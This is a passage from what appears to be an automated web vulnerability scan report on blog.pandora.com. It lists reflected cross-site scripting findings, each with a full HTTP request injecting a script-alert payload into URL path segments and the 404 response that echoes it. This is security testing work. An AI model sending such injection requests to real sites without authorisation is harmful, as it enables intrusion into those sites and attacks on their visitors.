Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/north-carolina31bd3<script>alert(1)</script>2c5162fd032/ was not found on this server.</p>
...[SNIP]...

3.384. http://blog.pandora.com/pandora/archives/north-dakota/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/north-dakota/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2610<script>alert(1)</script>d78d8cd256a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorab2610<script>alert(1)</script>d78d8cd256a/archives/north-dakota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab2610<script>alert(1)</script>d78d8cd256a/archives/north-dakota/ was not found on this server.</p>
...[SNIP]...

3.385. http://blog.pandora.com/pandora/archives/north-dakota/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/north-dakota/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5acb9<script>alert(1)</script>15a4ca42e12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5acb9<script>alert(1)</script>15a4ca42e12/north-dakota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5acb9<script>alert(1)</script>15a4ca42e12/north-dakota/ was not found on this server.</p>
...[SNIP]...

3.386. http://blog.pandora.com/pandora/archives/north-dakota/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/north-dakota/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e83f5<script>alert(1)</script>eae0ddbe282 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/north-dakotae83f5<script>alert(1)</script>eae0ddbe282/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/north-dakotae83f5<script>alert(1)</script>eae0ddbe282/ was not found on this server.</p>
...[SNIP]...

3.387. http://blog.pandora.com/pandora/archives/ohio/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/ohio/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0dd2<script>alert(1)</script>e2bfea7bc51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraf0dd2<script>alert(1)</script>e2bfea7bc51/archives/ohio/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf0dd2<script>alert(1)</script>e2bfea7bc51/archives/ohio/ was not found on this server.</p>
...[SNIP]...

3.388. http://blog.pandora.com/pandora/archives/ohio/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/ohio/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79fc4<script>alert(1)</script>3aa6b3a6382 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives79fc4<script>alert(1)</script>3aa6b3a6382/ohio/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives79fc4<script>alert(1)</script>3aa6b3a6382/ohio/ was not found on this server.</p>
...[SNIP]...

3.389. http://blog.pandora.com/pandora/archives/ohio/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/ohio/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 16703<script>alert(1)</script>25633d7f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/ohio16703<script>alert(1)</script>25633d7f8/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 344
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/ohio16703<script>alert(1)</script>25633d7f8/ was not found on this server.</p>
...[SNIP]...

3.390. http://blog.pandora.com/pandora/archives/oregon/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/oregon/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a724b<script>alert(1)</script>15c03653159 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraa724b<script>alert(1)</script>15c03653159/archives/oregon/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraa724b<script>alert(1)</script>15c03653159/archives/oregon/ was not found on this server.</p>
...[SNIP]...

3.391. http://blog.pandora.com/pandora/archives/oregon/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/oregon/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39f53<script>alert(1)</script>f58171d63c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives39f53<script>alert(1)</script>f58171d63c4/oregon/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives39f53<script>alert(1)</script>f58171d63c4/oregon/ was not found on this server.</p>
...[SNIP]...

3.392. http://blog.pandora.com/pandora/archives/oregon/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/oregon/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 88507<script>alert(1)</script>bba21d90949 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/oregon88507<script>alert(1)</script>bba21d90949/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/oregon88507<script>alert(1)</script>bba21d90949/ was not found on this server.</p>
...[SNIP]...

3.393. http://blog.pandora.com/pandora/archives/other-states/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/other-states/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4fb4<script>alert(1)</script>426d5c520e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorae4fb4<script>alert(1)</script>426d5c520e/archives/other-states/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 353

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorae4fb4<script>alert(1)</script>426d5c520e/archives/other-states/ was not found on this server.</p>
...[SNIP]...

3.394. http://blog.pandora.com/pandora/archives/other-states/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/other-states/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f143<script>alert(1)</script>15a8d762de1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives8f143<script>alert(1)</script>15a8d762de1/other-states/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives8f143<script>alert(1)</script>15a8d762de1/other-states/ was not found on this server.</p>
...[SNIP]...

3.395. http://blog.pandora.com/pandora/archives/other-states/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/other-states/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27558<script>alert(1)</script>268c97fcc9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/other-states27558<script>alert(1)</script>268c97fcc9d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/other-states27558<script>alert(1)</script>268c97fcc9d/ was not found on this server.</p>
...[SNIP]...

3.396. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/other_states/index.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4116e<script>alert(1)</script>e1dd3c30265 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora4116e<script>alert(1)</script>e1dd3c30265/archives/other_states/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 364

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4116e<script>alert(1)</script>e1dd3c30265/archives/other_states/index.html was not found on this server.</p>
...[SNIP]...

3.397. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/other_states/index.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbc81<script>alert(1)</script>8bbad4a334b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbbc81<script>alert(1)</script>8bbad4a334b/other_states/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 364

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbbc81<script>alert(1)</script>8bbad4a334b/other_states/index.html was not found on this server.</p>
...[SNIP]...

3.398. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/other_states/index.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e3b20<script>alert(1)</script>a06d1810695 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/other_statese3b20<script>alert(1)</script>a06d1810695/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 364

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/other_statese3b20<script>alert(1)</script>a06d1810695/index.html was not found on this server.</p>
...[SNIP]...

3.399. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/other_states/index.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a28a3<script>alert(1)</script>a45d2616222 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/other_states/index.htmla28a3<script>alert(1)</script>a45d2616222 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 364

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/other_states/index.htmla28a3<script>alert(1)</script>a45d2616222 was not found on this server.</p>
...[SNIP]...

3.400. http://blog.pandora.com/pandora/archives/pennsylvania/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/pennsylvania/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e30d<script>alert(1)</script>9faee399280 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2e30d<script>alert(1)</script>9faee399280/archives/pennsylvania/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
